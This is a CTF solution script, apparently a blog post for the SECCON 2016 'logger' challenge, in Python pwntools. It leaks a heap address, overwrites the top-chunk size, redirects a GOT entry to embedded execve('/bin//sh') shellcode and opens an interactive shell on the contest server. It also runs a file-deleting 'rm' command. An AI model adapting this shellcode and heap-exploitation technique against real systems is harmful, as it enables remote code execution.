SECCON 2016 logger

Games/CTF 2016.12.11 20:53

'''

with zzoru.

extremely LIBC-specific exploit.

1/16 chance to get shell.

'''


from pwn import *

import os

import random


DEBUG = True  # not referenced anywhere else in this listing

# pwntools context: makes pack()/p64()/u32() below use 64-bit little-endian.
context(os='linux',arch='amd64')

# Local-process variants are commented out; the script talks to the
# remote CTF service only.
#p1 = process("./logger")
p1 = remote('logger.pwn.seccon.jp', 6565)
#p2 = process("./logger")
p2 = remote('logger.pwn.seccon.jp', 6565)
# NOTE(review): both of these sockets are rebound to fresh connections
# further down without being closed first.

# Random suffix appended to the credentials in login(); computed once,
# so every login() call in this run uses the same account name.
R = str(random.randrange(10000))

def login(process):
    '''Register/log in on *process* using the shared random suffix R.

    Selects menu option 1, answers the 'Name    :' and 'Password:'
    prompts with 'zzoru'+R and 'zzoru5'+R, then blocks until the menu
    prints its '4. exit' line.  Because R is fixed for the whole run,
    every connection logs in under the same name (presumably how the
    two sessions see each other's state -- not verifiable from here).
    '''
    global R  # R is only read here; the global statement is redundant

    name = 'zzoru'+R
    password = 'zzoru5'+R
    process.sendline('1')
    process.recvuntil('Name    :')
    process.sendline(name)
    process.recvuntil('Password:')
    process.sendline(password)
    process.recvuntil('4. exit')


def debug(process, address):
    '''Attach gdb to *process* with a breakpoint at *address*, then pause.

    raw_input() (Python 2) blocks until Enter is pressed so the debugger
    can be set up before the script continues.  Not called anywhere in
    this listing; it only makes sense against a local process.
    '''
    gdb.attach(process, 'b *0x%x' % address)
    raw_input()


def read_log(process):
    '''Select menu option 1 and print up to 4096 bytes of the raw reply.

    Nothing is parsed; the output is dumped for the operator to read.
    The commented-out recvuntil is an earlier attempt to stop at the
    next menu line instead of reading a fixed-size chunk.
    '''
    process.sendline('1')
    print '=== log ==='
    #print process.recvuntil('1. Readlog')
    print process.recv(4096)


def write_log(process,size, log):
    '''Select menu option 2 and submit *log* with the declared *size*.

    *size* is sent verbatim after the 'Log size(max 128byte):' prompt.
    Only the local `size > 0` test decides whether the body is sent, so
    a zero or negative size sends the size line alone.  The 128-byte
    maximum named in the prompt is not checked on this side, and the
    declared size is not compared with len(log) either.
    '''
    process.sendline('2')
    process.recvuntil('Log size(max 128byte):')
    process.sendline(str(size))
    if size > 0:
        process.sendline(log)
    #process.recvuntil('4.exit')



def buf_leak(process):
    '''Select menu option 3 twice and read a 4-byte value after 'filename: '.

    Returns the value unpacked as a 32-bit little-endian integer.  If the
    fourth byte is 0x3d it is replaced by a zero byte before unpacking --
    an author heuristic; the header's stated 1-in-16 success rate is
    probably related, but that is inferred, not shown here.  The code
    assumes recv(4) returned all four bytes; a shorter read would make
    the leak[3] index raise IndexError.
    '''
    process.sendline('3')
    process.recvuntil('4. exit')
    process.recvline()
    process.sendline('3')
    process.recvuntil('filename: ')
    print '[+] filename : %s ' % process.recv(32)
    # Earlier 8-byte (u64) variant, left in by the author:
    # leak = process.recv(8)
    # if len(leak) == 8:
    # buf = u64(leak)
    # print 'buf addr: = 0x%x' % buf
    # return buf
    # else:
    # print 'leak error ' + enhex(leak)
    leak = process.recv(4)
    print enhex(leak)

    if leak[3] != '\x3d':
        buf = u32(leak)
    else:
        buf = u32(leak[0:3]+'\x00')
    print 'buf addr: = 0x%x' % buf
    return buf

# Target-specific constant; the name suggests a GOT slot of the binary,
# which is not part of this listing, so the value cannot be checked here.
write_got = 0x602020

# Raw amd64 machine-code bytes used as the payload body (context is
# arch='amd64'); left undecoded here.
shell_code = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"

# Shell string with a glob; its exit status is ignored.  Presumably a
# leftover from local testing against ./logger (see the commented-out
# process() lines) -- it does nothing to the remote service.
os.system('rm /tmp/logger/*')

# First session: the earlier p1 socket is replaced without being closed.
#p1 = process('./logger')
p1 = remote('logger.pwn.seccon.jp', 6565)
login(p1)
#write_log(p1, 128, p64(write_got+0x8) +  shell_code  + '\x90' * (128-8-len(shell_code)))

# Payload layout: four 8-byte words (32 bytes), then shell_code padded
# with 'z' to 72 bytes, then two trailing bytes -> 106 bytes, which the
# write_log call below zero-pads to the declared 128.  The 0x602040 word
# and the '\x20\xa4' tail are target-specific; their meaning is not
# derivable from this listing.
payload = p64(0x41414141)
payload += p64(0x42424242)
payload += p64(0x43434343)
payload += p64(0x602040)
payload += (shell_code + 'z'*(72-len(shell_code)))
payload += '\x20\xa4'
#payload += shell_code
write_log(p1, 128, payload + '\x00' * (128-len(payload)))
write_log(p1, 128, 'b' * 128)
#write_log(p1, -1, 'A')
#p1.interactive()
p1.recvline()
p1.close()

sleep(.1)

# Second stage: two fresh sessions under the same account (same R).
# The p2 opened at the top of the script is never closed.
#p1 = process('./logger')
p1 = remote('logger.pwn.seccon.jp', 6565)
#p2 = process('./logger')
p2 = remote('logger.pwn.seccon.jp', 6565)

login(p1)
login(p2)

# Two pack()ed words are sent (16 bytes under the amd64 context) while
# 32 is declared as the size.
topchunk_size = 0xffffffffffffffff
buf_addr = buf_leak(p2)
write_log(p1, 32, pack(topchunk_size) + pack(topchunk_size))
sleep(.5)
read_log(p2)
print hex(buf_addr)
sleep(.5)

# The size here is arithmetic on the leaked value; write_log only sends
# the 'AAAA' body when that result is > 0, so whether it is sent at all
# depends on the leak.  Success is probabilistic per the header (1/16).
write_log(p2, write_got-8*2-buf_addr-0x100-0x10, 'AAAA' )

# Option 1 and a command are sent blind, then the session is handed to
# the operator.
p2.sendline('1')
p2.sendline('ls -al')
p2.interactive()


